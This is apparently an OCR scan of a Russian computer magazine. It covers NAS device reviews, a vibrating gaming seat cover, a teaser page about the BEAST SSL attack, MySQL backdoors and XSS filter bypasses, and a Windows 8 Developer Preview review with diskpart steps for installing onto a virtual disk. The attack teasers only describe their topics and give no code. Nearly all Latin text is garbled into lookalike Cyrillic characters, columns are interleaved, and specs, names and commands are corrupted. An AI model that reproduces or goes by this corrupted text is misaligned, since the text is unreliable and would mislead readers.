Объем: 2, 4, 6 ТБ 
Поддерживаемые уровни 
КАЮ: 0, 1 и ЗіапсІагсІ 
Интерфейсы: ЕіНегпеІ 
10/100/1000 МЬрз, 1 х 115В 2.0 
Поддерживаемые 
протоколы: 5МВ/СІР5, АРР, 
РТР, НТТР, НТТР5 (ѴѴеЬАс- 
сезз), ИТР, КегЬегоз 
Потребляемая мощность: 17 
/24 Вт Мах 

Габариты: 86 х 204 х 127 мм 
Вес: 1.7 кг 



иыкзтАтюы рко оио 

О ерсия Рго Био является усовершенствованием 

І_іпк5*а*іоп Био. Начнем с того, что девайс способен 
выдавать данные со скоростью до 74 Мбайт/с, то есть 
почти 600 Мбит/с, что неплохо задействует гигабитный интер- 
фейс и пригодится в реальной жизни, если тебе понадобится 
срочно слить огромную базу данных или десяток ВБПір'ов. 
Максимальным объемом данных в 6 терабайт можно распоря- 
диться как душа пожелает: сделать одну папку, разбить на 
диски и раздать каждому пользователю или вообще включить 
девайс в домен и доверить управление политиками безопас- 
ности серверу. В любом случае, девайс одинаково хорошо 
будет работать и радовать тишиной и низким энергопотребле- 
нием -до 24 Ватт. 



иыкзтдтіоы рко оііао 




отрать деньги сейчас на этот девайс, забей его 
четырьмя дисками по 3 Тб и забудь на пяток лет о 
фразе «недостаточно дискового пространства». 
Просто представь, что в твоем распоряжении окажется 12 
терабайт, гигабитный интерфейс, ББЫД и ІІРпР-сервер, 
торрент-клиент, іТипез-сервер и что-нибудь-еще-что-так- 
нужно-пользователям. Компактный кубик предоставляет 
доступ к файлам практически по любому файловому про- 
токолу, который может быть использован в наше время. При 
потребляемой мощности, сравнимой с парой энергосберегаю- 
щих ламп, он способен создать РАІ Б -массив уровня 0, 1,5, 10 
и ЗЕЮБ. Остается только подключить к сети и настроить через 
ѵѵеЬ- интерфей с, а дальше уж качать — не перекачать. 




Интерфейс диска: 4 х 5АТА-ІІ 
Объем: 4, 8, 12 Тб 
Поддерживаемые уровни 
ПАЮ: 0, 1, 5, 10 и ЮСЮ 
Интерфейсы: ЕіЬегпеІ 
10/100/1000 МЬрз, 2 х 115В 2.0 
Поддерживаемые 
протоколы: АррІеТаІк, 5МВ/ 
СІР5, АРР, РТР, НТТР, І\ІТР, 
КегЬегоз 

Потребляемая мощность: 

43 Вт 

Габариты: 149 х 233 х 154 мм 
Вес: 5.5 кг 






Интерфейс диска: 2 х 5АТА 
Объем: 1, 2 Тб 
Поддерживаемые уровни 

паю: о, ивсю 

Интерфейсы: ЕіЬегпеі 
10/100/1000 МЬрз, 1 х У5В 2.0 
Поддерживаемые 
протоколы: АррІеТаІк, 5МВ/ 
СІР5, АРР, РТР, НТТР, ЮАР 
Потребляемая мощность: 

17 Вт 

Габариты: 82 х 40 х 135 мм 
Вес: 0.5 кг 



почему бы не сделать скоростной и компактный ЫАЭ?», — 
подумали инженеры из ВиНаІо и создали накопитель на базе 
дисков форм-фактора 2,5 дюйма. Этот сетевой накопитель 
чем-то напоминаеттостер: маленький, красивый и иногда жужжит. 

Но работает он настолько тихо, что ночью в комнате его можно и не 
заметить, а все потому, что компактные диски позволили обойтись 
без дополнительной системы охлаждения. Зато это полноценный 
ЫА5 с поддержкой всех нужных протоколов, сервером іТипез, ББЫА 
и ВіЮоггепІ-клиентом. Управление, как и у большинства устройств, 
осуществляется через простой ѵѵеЬ-интерфейс. Потребляет он 
крайне мало, а весит еще меньше — всего пол кил о, как зарядка от 
какого-нибудь ноутбука. Ты можешь выбрать девайс с белым или 
черным корпусом и поместить его на самом видном месте — пусть 
все гадают, что это такое. 
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ГЕМШМ 



Сергей Мельников 





ОБЗОР ВИБРОНАКИДКИ ОАМЕТРІХ ТРУБ І_ІѴЕ 2ЕЫ2Е 
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Материал: ткань/кожзам 

Количество вибромоторов: 6 
Интерфейс: 115В, 3.5 мм аудио 
Комплект поставки: накидка, блок 
питания, кабель 115В 









Трубка 15, прицел 120. Бац, бац, и мимо! Что, 
не хватает реалистичности в любимой игре? 
Ощущения не те? Неттряски от взрывов, 
не шумит под натруженными ягодицами 
движок родного танка. На одних колонках 
да ЗР-картинке далеко не уедешь, реализ- 
ма в игры эти технологии добавляют, но не 
настолько, чтобы проникнуться процессом. 
Вибрирующие джойстики оставим казуалам — 
настоящий танкист управляет машиной ис- 
ключительно при помощи клавиатуры и мыши. 
А чтобы ощущения от боев были приближены 
к боевым, рекомендуем тебе завести крайне 
необычный де вайе — вибронакидку бате^гіх 
Тгие Ііѵе зепзе. 

С одной стороны все понятно: перед нами 
накидка, и она вибрирует. С другой, непо- 
нятно — как вибрирует, куда вибрирует? 

Все очень просто — 6ате*гіх являет собой 
прокладку между... нет, не сиденьем и рулем, 
а между компьютерным креслом и, собствен- 
но, игроком. Обшита прокладка либо тканью 
(вариант подешевле], либо кожзамом (пре- 
зентабельней). Внутри же установлены шесть 
вибромоторов — как в мобильнике, только 
гораздо больше и мощней. Часть расположена 
в районе спины, часть — в районе пятой точки. 
Собственно, это и есть так называемая «об- 
ратная связь» — на манер виброджойстиков. 
Только действует несколько иначе. 

К компьютеру накидка подключается двумя 
способами — либо по 115В, либо через аудио- 
разъем. В первом случае вибрацией управляют 
драйвера и сама игра, во втором происходит 
простая фильтрация низких частот. Грубо 
говоря, вибрация включается в играх и музыке 
от басов (хитрая идея — сажать на кресло 
девушек и включать Заііз^асііоп]. С помощью 
комплектного регулятора силу вибрации можно 
подкорректировать — мощь моторов такова, что 



при желании можно вытрясти себе всю тазобе- 
дренную часть. 

Почему в начале статьи разговор зашел 
именно о танках? Да потому что накидка лучше 
всего работает с русской онлайн-игрой ѴѴогІб 
о{ Тапкз (тематика Второй мировой] — ѴѴоТ на- 
тивно поддерживает вибронакидку. Ввиду этого 
накидка попала ко мне в руки сразуже, как 
приехала в редакцию — сказалось увлечение 
бронетехникой и вышеупомянутой игрой. 

В ходе тестирования почти было смутил 
один момент — у батеітіх Тгие Ііѵе зепзе 
предусмотрены специальные ремешки для на- 
дежного крепления к классическому компью- 
терному креслу, однако мое домашнее кресло 
совсем не является компьютерным. Кресло 
как кресло, но и на нем накидка держалась 
очень надежно. 

Простая и быстрая установка драйверов, за- 
пуск игры, в которой автоматически включились 
нужные настройки, бой. Авторитетно скажу — 
накидка батеігіх, конечно, далека от реальных 
ощущений в танке. Но, тем не менее, это един- 
ственное и лучшее решение для того, чтобы 
почувствовать себя механиком-водителем. При 
езде танка накидка тихонько вибрирует. При 
стрельбе или попадании снаряда в танк проис- 
ходит виброудар. 

Вибрация не постоянна и при движении как 
бы перетекает от поясницы ниже и обратно. К 
вибрации быстро привыкаешь и перестаешь 
ее замечать — казалось бы, минус. Однако 
батеігіх выполняет очень полезную функцию — 
не дает телу затекать. Как только отключаешь 
накидку, сразу удивляешься, как неприятно 
стало играть без вибрации. Привыкаешь, и 
отказываться не хочется. Хорошо, что и цена на 
накидку батеітіх очень небольшая. Несовер- 
шеннолетние танкисты будут рады. Совершен- 
нолетние — тем более. □С 
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32 страницы журнала на одной полосе. 

Тизер некоторых статей из РС_20ЫЕ и ВЗЛОМА. 



Ргеѵіеѵѵ 



ВЗЛОМ 



72 



ЗВЕРСКИЙ УГОН 55І.-КУКИС0В 

Еще в 2004 году Грегори В. Бард подробно 
рассказал о фундаментал ьной уязви- 
мости в протоколах 55І_ 3.0 и ТІ_Б 1.0. Но 
так как в его работе было множество до- 
пущений, найденная брешь дол гое время 
оставалась чисто теоретической. Переве- 
сти ее в разряд практически реализуемых 
л ишь недавно удал ось аргентинским 
хакерам. Написанная имиутилита ВЕАБТ 
менее чем за 2 минуты расшифровавала 
секретную кукису с индентификаци- 
онной сессией РауРаІ, переданную по 
защищенному соединению. Учитывая, 
что большинство ресурсов по-прежнему 
используетстарые версии протоколов и 
не поддерживает их новые версии, легко 
можно представить, сколько шума на- 
делала эта атака. 
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ѴШ00ѴѴ58: ЧТО НОВОГО 




$иВЫМЕТЕХТ2,ИЛИКУНГ-ФУКОДИНГ 




24 


Компания МІСГ050Й продолжает делиться 


30 


Каким должен быть правильный редактор 


36 




наработками новыхОСзадолгодо их 




кода?У создателей этой программы свой 





релиза.ЧерновикбудущейѴѴіпсІо\л/5 8нас взгляд на этот счет, который пришелся по 

местами приятно удивил. вкусу программистам по всему миру. 



0Х4553-ШТЕКСЕРТЕК 

Создательубойного снифера под ѴѴіпсІоѵѵз 
рассказал нам о новыхтехникахМ ІТМ- 
атак, втом числе для перехвата паролей, 
которые должны передаваться по5БІ_. 



ВЗЛОМ 






БЭКДОРВБД 




ІРКАМЕ:ЗАЩИТАИ НАПАДЕНИЕ 




56 


Интересный концепттого, какспомощью 
стандартной функциональности Му5(ЭІ_ 


68 


На пальцахразбираемся, каксвязаны 
между собой понятия і^гате,траф и за- 


78 



можно оставить лазейку в системе, кото- грузки. Откуда берется и какмонетизиру- 

рую не всегда легко обнаружить. етсятрафик? 



Х55: КРОСС-САЙТИМ НАПОЛНУЮ 

10 способов обхода популярных филь- 
тров ХББ-уязвимостей, 6 принципов 
работы с ними, 4 способа использо- 
вания. 
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РС20ЫЕ 


Капитан Улитка 


ѴѴіпсІоѵѵз Оеѵеіорег 
Ргеѵіеѵѵ 




1' 1 ’.Ш ѴѴіпсІоѵѵз 7 ІІШтаіе 
, (гесоѵегесі) 

\М\*Л 




Ѵѵпа 

ПЕРВЫЙ ВЗГЛЯД НА ѵ ѵ 11 

БУДУЩУЮ СИСТЕМУ МТП І_Ц 
МІСК050РТ Л 1 и ГН 


оѵѵзо: 

эвого? 



В МісгозоД, похоже, решили 
повторить сценарий, успешно 
отработанный на ѴѴіпсІоѵѵз 7, и 
сделали раннюю сборку ѴѴіп- 
сіоѵѵз 8 доступной для установки 
всем желающим. Мы, само 
собой, тут же решили пощупать 
нововведения ѴѴіпсІоѵѵз 8 ЦеѵеІ- 
орег Ргеѵіеѵѵ своими руками. 



ѴШШІ 

Горячие клавиши 
ѴѴіпсІоѵѵз 8: 

Ьіі.Іѵ/тХРхѵСІ 

Патч, отключающий 
Меіго Ш: 

ЬіІ.Іу/пЫ2аЫ8 



ѴѴАКМШ6 



Горячие клавиши 
ѴѴіпсІоѵѵз 8: 

ЬіЦу/тХРхѵО 

Патч, отключающий 
Меіго Ш: 

Ьіиѵ/пЫгаЫ8 



СолСгоІ РэпеІ 



Регзопэііте 







Панельуправления 



ѴѴІШ0ѴѴ5 8 И ПЛАНШЕТЫ 

Главное, во что надо поверить, — МісгозоН: всерьез решила сделать 
ѴѴіпсІоѵѵз удобной системой для планшетных устройств. Поэтому 
самое важное, что произошло в новой системе, — это появление 
нового интерфейса Меіто III, не имеющего ничего общего с прежним, 
и оптимизированного для управления с помощью сенсорного экрана. 
Новшество пускай и радикальное, но для нас пока не столь полез- 
ное. Перед командой разработчиков и дизайнеров стоит непростая 
задача: сделать переключение между простым Меіто-интерфейсом 
и традиционным рабочим столом ѴѴіпсІоѵѵз как можно более легким и 
незаметным. Все это подчинено одной цели: чтобы новую ОС можно 
было использовать и там, и здесь. И на десктопных компьютерах, 
и на ноутбуках, и теперь вот планшетах. На последних, к слову, 
ѴѴіпсІоѵѵз 8 уже работает. На конференции ВШЮ, где представляли 
йеѵеіорег Ргеѵіеѵѵ, были показаны устройства, базирующиеся на 
процессоре АРМ. 

МЕТРО ІЛ 

Новый интерфейс Ме*го III — первое, что ты видишь при загрузке 
системы. И это главное нововведение, признаться, поначалу пугает. 
После загрузки ты видишь не привычные иконки рабочего стола, а 
пестрые компоненты и виджеты нового Ноте Зсгееп'а, который как 
брат-близнец напоминает интерфейс ѴѴіпсІоѵѵз РНопе. Если бы ты 
работал на планшете, удобно было бы скроллить полоску с компо- 
нентами вправо-влево. Компоненты, как правило, представляют со- 
бой ярлык для запуска приложения, но некоторые могут отображать 
информацию или оповещения, связанные с программой. Они имеют 
разные размеры, их можно перемещать как угодно. Клик по любому 
приложению (скажем, П35-аггрегатору новостей) открывает его 
на весь экран (чтобы закрыть его и вернуть обратно, используется 
клавиша ѴѴіп). Все элементы увеличены и максимально заточены под 
то, что взаимодействовать ты с ними будешь пальцем. Короче говоря, 
получился эдакий уголок для планшета. Пользоваться на обычном 
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ѴѴіпсІоѵѵз 8: что нового? 




МеІгоШ 



компьютере ты им едва ли будешь. Однако любое установленное 
приложение, для обычного интерфейса или Меіго III, попадет в этот 
новый экран «51:аг1». Главное для нас сейчас, что здесь же есть за- 
мечательный компонент «Оезкіор», который открывает... привычный 
интерфейс Винды. Слава богу :). Двигаемся дальше, потому что Меіто 
III лучше увидеть своими глазами, пусть даже на видеоролике с 
ѴоиІшЬе'а. 

ДЕСКТОПНЫЙ ИНТЕРФЕЙС 

Итак, рабочий стол никуда не делся. Спасать его не надо. Перейти в 
традиционный режим можно и по хоткею ѴѴіп + М. Но не спеши нажи- 
мать на кнопку «5*агІ», иначе система опять вернеттебя в Меіго III. 
Все потому что меню «Пуск» в том понимании, к которому мы все при- 
выкли, скорее всего в системе уже не будет. В блогах МЗйІЧ [ Шр://Ы1. 
Іѵ/г05СС4 І подробно рассказывается о том, как в 1992 году впервые 
появилось меню «Зіагі», придя на смену «Менеджеру программ» из 
ѴѴіпсІоѵѵз 3.x, оно как изменялось и перерабатывалось от версии к 



0 5еніпо5 
© Оеѵігрх 
і- ЗНлгс 
Р ЗеагсЬ 




т* !>іап 


т 


и 



Дополнительное меню 



версии ѴѴіпсІоѵѵз икакпришлок своему логическому концу. Сейчас 
статистика такова, что юзеры используют этот элемент интерфейса 
все реже и реже. Приводится подробная статистика: даже просто 
открывать меню в ѴѴіпсІоѵѵз 7 стали на 11% меньше, чем в ѴѴіпсІоѵѵз 
Ѵізіа. Пользователи практически не прикрепляют программы в 
«Пуске», а делают это в таскбаре. Собственно, последний теперь и 
будет выполнять обязанности инструмента для запуска приложений. 
А кнопка «Біагі» будет открывать тот самый Меіго III, о котором мы 
только что говорили. 

Если навести мышкой в левый нижний угол, появится новое 
меню, откуда можно быстро вызвать упрощенные настройки (кстати, 
именно сюда запрятали кнопку для выключения компьютера — 
бьюсь об заклад, что ты будешь ее искать], управлять девайсами, 
расшаривать данные или выполнять поиск. Переработан так же 
режим для работы с двумя мониторами. По умолчанию он показывает 
Меіго III на одном дисплее и рабочий стол на втором. Если включить 
на обоих мониторах обычный десктоп, можно видеть, что в ѴѴіпсІоѵѵз 




Ѵсшг РС глп іпЬо а рю-Ыегт ІІШ И сшісіпЧ 
Зіапгііе, але! по^ іі пеякк іо гоііаг*. 
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Новый ВБОй 
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РС20ЫЕ 



БЫСТРЕЕ ИЛИ НЕ БЫСТРЕЕ? 



Впрочем, первое, на что обращаешь внимание в ѴѴіпсІоѵѵз 8, — это 
время загрузки системы. Система грузится гораздо быстрее, и это 
заметно невооруженным взглядом. МісгозоН: несколько раз заявляла 
о различных оптимизациях в производительности ѴѴіпсІоѵѵз 8. Раз- 
работчики рассказывают, что им удалось сделать фундаментальные 
улучшения. Если ѴѴіпсІоѵѵз 7 5Р1 при запуске использует около 404 Мб 
и 32 запущенных процесса, то текущая версия ѴѴіпсІоѵѵз 8 — всего 271 
Мб и 29 процессов. Овеклокеры из Ціеіпаскег.сопп решили проверить 
честность этих заявлений ( ІііеНас.кг/оА2рОР ) и провели несколько 
простых тестов на довольно хардкорной системе: Соге І7 3.8 ГГц с 6 
Гб оперативки, жестким диском на 2 Тб и видеокартой ІЧѵісІіа беРогсе 
9800 ОТ. Результаты представлены в таблице. 





ѴѴіпсІоѵѵз 8 


ѴѴіпсІоѵѵз 7 


Время загрузки 


0:10 


0:35 


Сжатие файла (-700М6) 


0:29 


0:32 


Распаковка файла ( -700 Мб) 


0:11 


0:12 


Кодирование фильма в НапсІЬгаке 


8:06 


8:15 


Запуск 9 приложений 


0:46 


0:46 


Открытие 10 вкладок в СЬготе 


0:07 


0:07 


Результат в ЗбтагкЮ 


6470 


6455 




Упрощенный менеджер задач 

8 панель задач наконец отображается не на одном мониторе, как это 
было раньше, а на обоих (раньше я для этого использовал специаль- 
ную тулзу МиШМопі^ог ТазкВаг). Плюс к этому система поддерживает 
специальные обои «биаі топііог» для рабочего стола. Короче говоря, 
изменения в интерфейсе ѴѴіпсІоѵѵз 8 коснутся не только пользовате- 
лей планшетников. К новому интерфейсу Ме*го ребята из Місгозо^ 
обновили и святая святых — синий экран смерти. Он же ВЗОй. Он же 
ВІие зсгееп о{ беаіН. Все, что теперь отображается, — это груст- 
ный смайлик и сообщение о том, что в системе возникла проблема, 
поэтому компьютер необходимо перегрузить :). И мелким шрифтом 
обозначена очень обтекаемая формулировка проблемы, вроде НАІ__ 
ІМІТІАІ_І2АТЮМ_РАІІ_ЕО. 



Получается, что самые серьезные оптимизации коснулись 
процесса запуска системы. Он стал в 3.5 раза быстрее (считалось 
время отэкрана загрузки системы до появления рабочего стола). 
Во всем остальном особого прироста нет, но заметь, учитывая все 
новые навороты -хуже не стало. Наверное, и это неплохо :). 




Новый таск-менеджер 



НОВЫЙ ѴѴІЫйОѴѴБ ЕХРЮКЕК 

Серьезно изменился облик многих привычных компонентов системы, 
в частности ѴѴіпсІоѵѵз Ехріогег. Стандартный файловый менеджер 
получил РіЬЬоп-панель, как в ОГГісе 2007/2011. Для разных типов 
файлов в этой панели отображаются соответствующие вкладки. 
Например, если кликнуть на файл с изображением, то во вкладке 
«Мападе» будут отображаться кнопки для выполнения некоторых 
основных преобразований. А, к примеру, для 150-образа будут до- 
ступны кнопки для монтирования его в виде логического диска или 
записи на болванку (ура, и для того и для другого теперь можно обой- 
тись без утилит вроде II Ига 150) . Обновилось и меню «Рііе». Теперь из 
текущей папки можно запустить командную строку — как с правами 
пользователя, так и админа. Сильно изменилось диалоговое окно 
для копирования/перемещения файлов. Если включить отображе- 
ния деталей, то можно увидеть симпатичную диаграмму и скорость, 
с которой копируются файлы. Если в данный момент выполняет- 
ся несколько операций, то одну из них можно остановить, чтобы 
расставить приоритеты. Кстати, намного удобнее стала обработка 
конфликтных ситуаций. Система теперь отображает старые и новые 
файлы с одними и теми же именами в виде двух столбцов, чтобы вы- 
брать файлы для замены было максимально удобно. А если речь идет 
об изображениях, сразуже показываются и их превьюшки. 

НОВЫЙ МЕНЕДЖЕР ЗАДАЧ 

Не самым кардинальным, но совершенно точно значимым ново- 
введением ѴѴіпсІоѵѵз 8 стал переработанный таск-менеджер. Когда 
запускаешь его в первый раз, зрелище может слегка удивить. По 
умолчанию запускается очень упрощенная версия менеджера задач, 
с помощью которой единственное, что и можно, — это выгрузить 
ненужные приложения. Вместо кучи разных вкладок ты увидишь 
простой список запущенных приложений и одинокую кнопку«Епб 
Тазк». Если попытаться выгрузить из памяти Меіто-приложение, оно 
перейдет в режим «зизрепсіесі» (это происходит потому, что такие 
приложения не выполняются в фоновом режиме и не потребляют 
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ѴѴіпсІоѵѵз 8: что нового? 



БЕЗОПАСНАЯ УСТАНОВКА ѴѴІІМБОѴѴБ 8 НА ВИРТУАЛЬНЫЙ ЖЕСТКИЙ ДИСК 



г — — .,ш 

Создать и присоединить виртуальный жесткий диск 




Укажите расположение виртуального жесткого диска на 
компьютере . 

Расположение. 




0:Шца1 МасЬяіе*\Мп8.ѵМ 


Обзор... 


Размер виртуального жесткого лиска: 60000 

Формат виртуального жесткого диска 
О Динамическое расширение 


МБ ▼ 


Размер этого виртуального жесткого диска расширяется до 
Фиксированного максимального размера по мере 


сяминения на нем ламнък. Пои ѵлалении данньк оазмео 



Если ты хочешь поиграться с новой системой 
без ущерба основой ОС, у тебя обычно есть два 
варианта: 

1. Виртуализация. Устанавливая систему 
под виртуалкой,ты обрекаешь себя на то, 
что работать она будет... медленнее. Даже 
если платформа поддерживаетаппаратную 
виртуализацию, ресурсы компьютера будут 
разделяться междухостовой и гостевой ОС. 

2. ОиаІ-ЬооГ Ничего не стоитустановить 
ѴѴіпсІоѵѵз 8 на компьютер, где уже работает, 
скажем, «семерка». Главное условие — ин- 
сталлитьновую ОС на отдельный раздел (или 
жесткий диск). Но возиться с бутл оа дера ми 

и созданием нового раздела неохота. Всегда 
есть вероятность, что экспери мент превра- 
тится в море крови. 

С появлением ѴѴіпсІоѵѵз 7 существует еще 
один вариант. Установить систему на вирту- 
альный жесткий диск — ѴНй (Ѵігіиаі НагсІ йгіѵе 
Рііез). Система видиттакие файлы как находя- 
щиеся на самом обычном диске, хотя на самом 
деле они живут внутри .ѵНб-файла. Получается, 
что идеальный вариант — поставить систему на 
такой виртуальный жесткий диск и работать на 
своем основном компьютере, не рискуя убить 
напрочь основную систему. Так и сделаем. 

1. Нам понадобится много свободного места, 
чтобы создатьжесткий диск. Скажем, 60 Гб. 
Если будет сильно меньше, то будь готов к про- 
блемам вроде неожиданного В5СЮ. 

2. Дляустановки нам понадобятся образ 
ѴѴіпсІоѵѵз 8 БеѵеІорегРгеѵіеѵѵ. Мы какобычно 
можем установить его с загрузочного диска 
или флешки. Мне нравится второй вариант, 
тем более что всю работупо переносу файлов 
из образа на флешку и настройку на ней за- 
грузчика возьметна себя официальнаяутили- 
та от Місгозок — ѴѴіпсІоѵѵз 7 ІІБВ/ОѴй боѵѵпіоасі 
ІооІ ( ЬІСІѵ/пУѵІр9 ). 

3. Далее нужно создать виртуальный жесткий 
диск, на который мы будем выполнятьуста- 
новку. Для этого открываем консоль от имени 
администратора и запускаем утилиту сіізкрагк 

С: \ЫіпсІоы5\5у5І:ет32>сІІ5краг1: 



Місгозо-Рі: РізкРагІ: версии 6.1.7601 
На компьютере: ТНІ5І55ТАТІОІЧ 



РІ5КРАКТ > 

сгеаііе ѵсіізк б1е="сІ : ХѴігЬиаІ Ма- 
сІііпез\ІлІіп8. ѵМ" іуре=ехрапсІаЫе 
тахітит=60000 



Завершено (в процентах): 100 



Файл виртуального диска успешно 
создан с помощью программы РізкРагІ: . 



Создание виртуального жесткого диска 

То же самое можно сделать через «Управле- 
ние компьютером». Надо выбрать в дереве: 
«Запоминающие устройства -> Управления 
дисками», далее меню «Действие -> Соз- 
дать виртуальный жесткий диск». Главное 
выбрать динамический тип виртуального 
диска. 

4. Далее загружаемся с нашей флешки, и тут 
первый важный момент. Необходимо вы- 
брать режим инсталляции «Сизіогп», иначе 
установщик снесет твою основную систему. 

Я тебе предупредил. Далее следующий 
важный момент. Установщик предложит 
тебе выбрать раздел для установки системы. 
Так вот — не надо ничего выбирать! Надо 
открыть консоль (5ЫН + РІО), запустить 
утилиту 6 ізкрагі и при монтировать недавно 
созданный ѴНР- контейнер: 

РІ5КРАКТ > зеіесі ѵсіізк б1е="сІ : \Ѵіг- 
іиаі МасІзіпе5\ІлІіп8. ѵМ" 

РІ5КРАКТ> аііасіі ѵсіізк 

Далее переключаемся по <АІ_Т-ТАВ> обратно 
к выбору раздела для установки и обновляем 
список. Теперьты должен увидеть раз- 
дел, у которого будет нужный нам размер. 
Мастер установки предупредиттебя, что 
не сможетустановить систему на этот диск. 
Врет зараза! Просто нажми О К и продолжай 
установку. 

5. После окончания установки и перезагрузки 
ты увидишь совершенно новый графиче- 
ский бутл оа дер с новым элементом меню 
для выбора ѵѵскать систему! Надо сказать, 



что это хороший расклад, потому что, если 
аналогичный фокус провернуть с «семер- 
кой», придется дополнительно ковыряться 
с загрузчиком, чтобы тот увидел систему на 
ѴНБ -диске. Тутустановщик все сделал сам. 
Мелочь, а приятно :). 

Справедливости ради стоит сказать, что 
можно и вовсе обойтись без флешки или за- 
грузочного 0Ѵ0. Идея такая: 

1. СоздатьѴНО-диск; 

2. Скопировать на него все содержимое устано- 
вочного образа. 

3. Перезагрузитькомпьютер, войти в консоль 
восстановления (по клавише Г8) и войти в 
существующую систему. Нам нужно примон- 
тироватьнаш ѴНО и за пустить оттуда уста- 
новщик. Делаем это опять же через консоль и 
сіізкра гі: 

РІ5КРАКТ> зеіесі: ѵсіізк б1е=сІ:\ѴМ5\ 
ІлІіп8. ѵМ 

РІ5КРАКТ> аііасіі ѵсіізк 

Перед выполнением команды лучше запу- 
стить какую-нибудь программу (например, 
поіерасі) и убедиться, что буквы дисков не 
поменялись (например, сі: не стал Г). 

4. Теперьможнозапускатьустановщик:Г\5е1ир. 
Здесь Г — буква п ри монти рова иного ѴНО. 

5. Чтобы не убить напрочь систему, важно вы- 
брать вариант установки «Сизіот». Благо- 
даря этому, мы сможем выбрать раздел, на 
который будет осуществляться установка. 
Надо ли говорить, что этим разделом должен 
быть наш ѴНО? :) 
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РС 20 ЫЕ 



ВОЗМОЖНОСТИ ДЛЯ ПРОГРАММИСТОВ 



Дожили! :] Для создания приложений для ѴѴіпсІоѵѵз 8 теперь 
можно использовать довольно неожиданные варианты: например, 
НТМІ_5 + ^ѵазсгірЕ Ночтоещеболееважно — это появление 
ѴѴіпРТ — своего рода замены устаревшей во многих отношениях 
ѴѴіп32. Он предоставляет собой современный АРІ для множества 
функций, которые ранее представлял только ѴѴі п32 АРІ. Его 
нельзя рассматривать как замену ѴѴі пЗ 2, но вполне можно считать 
альтернативой. Особенности: 

• Реализует новый интерфейс Меіго; 

• Имеет простую модель создания III для разработчиков (не 
нужно больше ковыряться как с ѴѴі п32); 

• Все АРІ разработаны как асинхронные; 

• АРІ выполняются в ВапсІВох'е (поэтому создание с помощью 
ѴѴіпРТ низкоуровневых программ, скажем, для разметки 
диска, будет проблематично]. 
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Доработки проводника 



ресурсы). Есть и полноценный таск-менеджер. Нажав на кнопку 
«Моге сіе^аііз», ты увидишь старый добрый менеджер задач, который, 
наконец-то, серьезно прокачали. Так, список задач во вкладке 
«Ргосеззез» теперь наглядно делится на категории: приложения и 
фоновые процессы. Как и прежде, для каждого отображается коли- 
чество потребляемых ресурсов — процессора и оперативной памяти, 
но теперь дополнительно отображаются еще индикаторы дисковой 
и сетевой активности. Причем ячейки в таблице меняют цвет в за- 
висимости от интенсивности использования ресурса, поэтому сразу 
видно, где «гад сидит» :]. Прожорливый процесс тутже можно не 
просто выгрузить, но еще... перезапустить (просто, но какудобно!]. 
Утилита «Рег^огтапсе» также получила совершенно новый внешний 
облик в стиле Меіто III, и диаграммы потребления разных ресур- 
сов теперь выше всяких похвал. Впервые появилась вкладка «Арр 
Нізіогу»: на ней отражается статистика используемых тобой при- 
ложений. Причем для каждого подсчитывается суммарное количе- 
ство потребления (например, процессорного времени). Вероятно, эти 
данные могут быть полезны, чтобы оптимизировать время работы 
от аккумулятора (отказавшись от каких-то особо требовательных к 
ресурсам приложений). Вкладка «Зіаг1:и р» должна была появиться 



в менеджере задач еще лет десять назад, но поя вилась сейчас — и 
это уже хорошо. В самом деле, всегда было понятно, что возможность 
убрать лишнее из списка приложений, которые запускаются вместе с 
системой, должна быть прямо в менеджере задач. И вот свершилось. 

І_0СК 5СРЕЕЫ И СИНХРОНИЗАЦИЯ 

Новый Іоск-скрин намного интереснее своего унылого предше- 
ственника. На красивой картинке разбросаны виджеты с полезной 
информацией вроде текущего времени и количества непрочитанных 
сообщений. Опять не обошлось без заточенности под планшетни- 
ки: чтобы разблокировать систему, необходимо пролистнуть экран 
вверх. Помимо обычного ввода пароля, есть довольно любопытный 
вариант входа в систему — «пароль из картинки». Идея в том, чтобы 
не вводить символьный РІІМ, а, глядя на картинку, в правильной 
последовательности нажать на строго определенные ее части. 

Надо ли говорить, для чего это может понадобиться? :] Для входа в 
систему теперь можно использовать ѴѴіпсІоѵѵз І_іѵе Ю, и это неспро- 
ста. Если покопаться в настройках, нельзя не заметить раздел «5упс 
РС Зеиіпдз». Это новая фича, позволяющая синхронизировать на- 
стройки с другими девайсами ѴѴіпсІоѵѵз 8, используя аккаунт ѴѴіпсІоѵѵз 
І_іѵе Ю. Чтобы иметь одинаковые настройки на разных компьютерах, 
достаточно использовать для входа один и тотже аккаунт ѴѴіпсІоѵѵз 
І_іѵе. Заметь, что возможность входа по обычным, то есть локальным 
учеткам, сохранилась. Помимо настроек через облако могут быть 
синхронизированы также адресная книга, фотографии, данные из 
ЗкуОгіѵе. 

БОНУСЫ НАПОСЛЕДОК 

Сценарий, когда смелым пользователям предлагается поиграть с 
новой системой и косвенно повлиять на то, что будет реализовано в 
релизе, очень радует. Очевидно, что в ѴѴіпсІоѵѵз 8 сохранится преем- 
ственность, но появятся и новые кардинальные функции. Уже сейчас 
изменений довольно много, и это даже не бета-версия. Напоследок 
хочу перечислить некоторые другие бонусы, о которых я не расска- 
зал в рамках материала: 

• В Меіто III уже доступна иконка магазина приложений. Кажется, 
Місгозо^ сделал его самым последним. Да и то ѴѴіпсІоѵѵз Арр 51:оге 
поканеработаетвОеѵеІорегРгеѵіеѵѵ. Н о когда ма гази н, на конец, ста - 
нетдоступным, через него можно будет покупать как при ложен ия для 
планшетников, так и традиционные десктоп ные программы. Чтобы 
попасть в каталог приложений, нужно быть подписчиком. 

• Проверка орфографии теперь работает по всей системе, независимо 
отприложения(да-да,радиэтогоприходилосьустанавливатьдопол- 
нительные утилиты). 

• Другая интересная фича — Не^гезН ѴоигРС — позволяет вернуть 
системувизначальноесостояниепонажатиюодной кнопки. Неужели 
большенепридетсяпереустанавливатьсистему?Интересно,чтомож- 
но нетолько вернуться к состоянию поел е установки, но и установить 
несколько ге^гезИ -точек — своеобразных образов, которые можно 
накатить на систему. И-И 
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Попробуй найди кнопку для выключения 
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Интерактивный учебник программированию 



СООЕСАОЕМѴ 

ѵѵѵѵѵѵ.согіесасіету.сот 

Каждый, кто изучал какой-нибудь язык программирования, знает, каким утомительным 
может стать чтение сухой литературы. Хочется попробовать новые знания здесь и сейчас, 
не прыгая туда -обрати о от чтения к реализации примеров. Недавно поя вившийся сервис 
Собесабету (академия программирования) пытается решитьэту проблему, предлагая 
интерактивный интерфейсдля обучения программированию (покатолько баѵаЗсгірі). 

Идея — сделать процесс максимально интерактивным. Теория выдается очень маленькими 
порциями, но главное: ее сразу предлагается проверить в интерактивной консоли. Пока 
